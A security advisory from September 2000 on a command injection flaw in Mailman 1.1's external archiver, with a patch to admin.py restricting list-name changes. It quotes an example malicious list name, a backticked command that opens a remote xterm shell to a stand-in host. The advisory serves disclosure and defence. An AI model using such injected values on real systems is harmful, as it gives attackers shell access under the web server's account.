[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : MailMan 1.1 + external archiver vulnerability

Title: MailMan 1.1 + external archiver vulnerability
Released by:
Date: 7th September 2000
Printable version: Click here

   Mailman from www.list.org is a mailing list manager with strong Web

   functionality.  If a site is running Mailman 1.1 with an external

   archiving mechanism that uses the internal variable %(listname)s,

   list administrators can run any command with the Webserver's


   A patch is available at the end of this message.


   Sites running versions prior to Mailman 1.2beta with external

   archiving enabled.


   This bug was reported to the developers in late November, 1999, and

   was fixed in the CVS source tree.  Newer beta versions of Mailman

   are not susceptible, yet it has recently come to my attention

   that the vulnerable 1.1 package is still available as a stable,

   non-beta release on the Mailman site(s):




   Mailman has a mechanism that allows messages sent to a mailing list to

   be pumped into some sort of external program.  Traditionally this

   involves some sort of Web-based archiver like MHonArc or hypermail.

   To make the archiving more powerful, macros can be used based on

   internal Mailman values.  For example, list archives can be saved

   on a per list basis with this line in $prefix/Mailman/mm_cfg.py:

      PUBLIC_EXTERNAL_ARCHIVER  = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'

   The problem comes from the %(listname)s expansion.  Since it's derived

   from a value that can be set on a per list basis by the list administrator,

   it's subject to tampering.  Consider a list who's name was changed


      `/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh`

   by a list administrator.  As soon as a message is sent to the list

   this command will be executed, opening a remote xterm with a shell

   running with the Web server's uid/gid.  Any command available to the

   Web server can be executed in this fashion.

   Other variable names can be accessed if your PUBLIC_EXTERNAL_ARCHIVER

   definition is configured to use them.  The patch below will only

   fix problems with %(listname)s expansion.


   Upgrade to a later version of Mailman, or install the supplied patch.


   This patch was provided my the Mailman developers and later cleaned up

   to work against a stock 1.1 distribution.  It works by only allowing

   listowners to change case values within the name of their list.

   Obviously a better long-term solution that sanitizes system calls, etc.

   should be considered.

Christopher Lindsey


Mallorn Computing, Inc.

-------------------- snip snip --------------------

*** admin.py.bak        Mon Mar 13 21:03:53 2000

--- admin.py    Mon Mar 13 21:04:51 2000


*** 784,789 ****

--- 784,800 ----

                  val = cgi_info[property].value

              value = GetValidValue(lst, property, kind, val, deps)

              if getattr(lst, property) != value:

+                 # TBD: Ensure that lst.real_name differs only in letter

+                 # case.  Otherwise a security hole can potentially be opened

+                 # when using an external archiver.  This seems ad-hoc and

+                 # could use a more general security policy.

+                 if property == 'real_name' and \

+                    string.lower(value) <> string.lower(lst._internal_name):

+                     # then don't install this value.

+                     document.AddItem("""

real_name attribute not + changed! It must differ from the list's name by case + only.

""") + continue setattr(lst, property, value) dirty = 1 # -------------------- snip snip --------------------

(C) 1999-2000 All rights reserved.